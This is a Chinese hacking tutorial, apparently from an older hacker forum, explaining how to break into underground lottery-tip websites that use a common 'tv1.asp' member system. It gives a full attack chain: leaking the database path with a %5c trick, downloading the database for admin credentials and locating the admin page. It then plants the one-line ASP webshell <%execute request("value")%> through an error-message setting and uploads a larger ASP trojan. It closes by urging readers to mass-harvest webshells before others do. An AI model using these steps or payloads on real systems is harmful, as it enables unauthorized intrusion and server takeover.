在旁注盛行的今天，要想获得webshell并不是什么难事，但是要想获得一个地下***网站的webshell就难了。
 
  我们来分析一下原因，首先来看看在什么情况下我们会用旁注，想要入侵一个网站，而在这个网站上又找不到任何可
以利用的漏洞，我们就会通过 http://whois.webhosting.info ，来查找和这个网站在同一服务器的其它网站，
然后找一个安全最弱的站入侵进去，这就是旁注的前提条件。
 
   可以是这一招对***网站却没有什么作用，为什么这么说呢？因为自从地下***网站被国家定为非法网站之后，
那些利用***网站骗钱的人，就再也不敢在虚拟主机上租空间开***网站了，而是自己专门买一台服务器把网站放上面，
一般一台服务器上有几个到几十个不等的***站，它们不但内容基本一致，就连使用的程序也一样的。所以你在上面找不到一个很    弱的站，这样就让旁注失去了作用。要入侵它们，你必须从网站程序本身下手,而网上又没有已经公布的原代码，
给查找漏洞带来了一定的难度。

   今天我就给大家带来一个地下***网站常用的会员系统漏洞，利用这个漏洞我们可以轻易的取得
大量的webshell，是不是感觉很爽啊，大家跟我一起来吧。

   先在百度搜索“tv1.asp”你会发现这样的会员系统很多，我们随便进一个看看，
打开http://www.xxx.com 。哇，上面既然写道“[大陆最权威***论坛]2004年度非常好的***网站”
广告做得挺吓人的，等下我们进去看看它到底有什么过人之处(图一)。

  我先给大家分析一下绝大部分的***网站的结构（图二），
首页是html格式的，我们的主要目标放在论坛和会员系统上。关于论坛的漏洞，我曾经在网上发布过2个动画，
其实这个“六合专用BBS” ，论坛的作者在上面安放了后门的，我以后有时间再给大家讲吧，
今天我们不讲论坛，只讲会员系统。

   进入会员系统，这里有一句中特会员区、一码中特会员区、一肖中特会员区、八码中特会员区，
随便选一个，就进“一句中特会员区”吧（图三）。看一下资料，哇！这里的资料是%100的正确，
没有一期错误，真的有这么神奇吗？可惜现在看到的历史记录，真想去会员区看个真假。

   在密码框输入一个单引号提交，跳转到一个错误页面，看来单引号被过滤了，真晕啊。那试试暴库吧，
把tv1.asp前面的 / 换成%5c提交，真是太不可以思意了，暴出了数据库的D:\4803\database\user_list_db.asp，
哈哈（图四）。那么数据库的相对路径就应该是http://www.xxx.com/te/database/user_list_db.asp，
赶快把数据库用网际快车下下来瞧瞧吧。在数据库里名为manage的表中找到了一个帐号和密码，仅仅一个帐号我琢磨了一下，
可能是管理员的，另外我们在会员登录的地方也没有见到要输入用户名。那么我们来找管理员后台吧，
试着提交了几个常用登录页面，找到管理员后台为admin_login.htm，
这个可能是默认的后台吧，大家在入侵的时候要是找不到后台可以试下我的经验。
-----------------------------------------------------------------------
   如果后台是login.asp 、admin.asp，一类常见后台,可以用啊D_SQLTools 和 NBSI2 ，它们的后台猜解功能都是不错的，
NBSI2还设置了对 access 数据库地址的猜解。 也可以用“web路径猜解工具”来猜，功能更强大，扫描速度更快。

   如果后台不是login.asp 、admin.asp一类默认后台名，而是自己改了名字，
比如改成wangqiang.asp  ，这样是很难猜到的 。这种情况最好是去网上找这套网站程序，找到以后就好办了。
管理员一般只改了登录的页面，而实现管理功能的页面却没有改，比如添加文章和会员，上传图片、删除文章和会员。
我们只要提交这些功能页，因为没有登录，程序会自动跳回到登录页面，要求我们输入帐号、密码，然后登录，
这样就找到了登录的页面。
--------------------------------------------------------------------------

    用我们开始在数据库里面查到帐号、密码，登录就进入了管理员后台。
我们看下主要功能为：密码修改、 添加记录、记录管理、系统设置 ，我在后台把这些功能一个个查看，
突然眼前一亮发现系统设置里面的管理员自定义“出错信息”既然支持HTML，是不是也可以写asp呢？
前面我们也看到了数据库的名字为user_list_db.asp，后缀是asp的，那么我们是不是可以写一个asp木马到数据库里面呢？
带着这个疑问，我去找来了我的最爱：一句话asp木马，把服务端<%execute request("value")%>，写到一码出错信息编辑
栏，然后提交（图五）。

   接着用记事本打开一句话木马客户端把数据库的路径添加到第一句里面，
<form action=http://www.xxx.com/te/database/user_list_db.asp method=post>，保存一下。
打开客户端，在第二个编辑框写入一个更强大的asp木马，点提交，新添加的木马名字是wei.asp（图六）。
这次我是用的海阳顶端网ASP木马2006，强大得没话说。用FSO文件浏览操作器，查看站点所在的D盘，发现
服务器里面足足有15个地下***的网站（图七），而且内容和网站结构以及所用程序也基本一致，所谓的会员区，
其实里面任何资料都没有，我又查一遍这个网站的ip物理地址竟然是重庆。

  好了，心动不如行动，按一个服务器上10个***网站计算，那么现在就已经有成百上千个地下***网站的
webshell等着你去取了。嘿嘿，动作要快哦，不然别人就先下手啦！

   最后提一下，原来有一个叫 lxing 的朋友在“中国教程下载站”发表了一个入侵***的动画教程，
在上面要求我把“tv1.asp”会员页面的漏洞讲解一下，我今天就在这里给大家全部交代了，
有什么不明白的地方，欢迎指教。http://www.hack58.net/Article/60/63/2005/4847.htm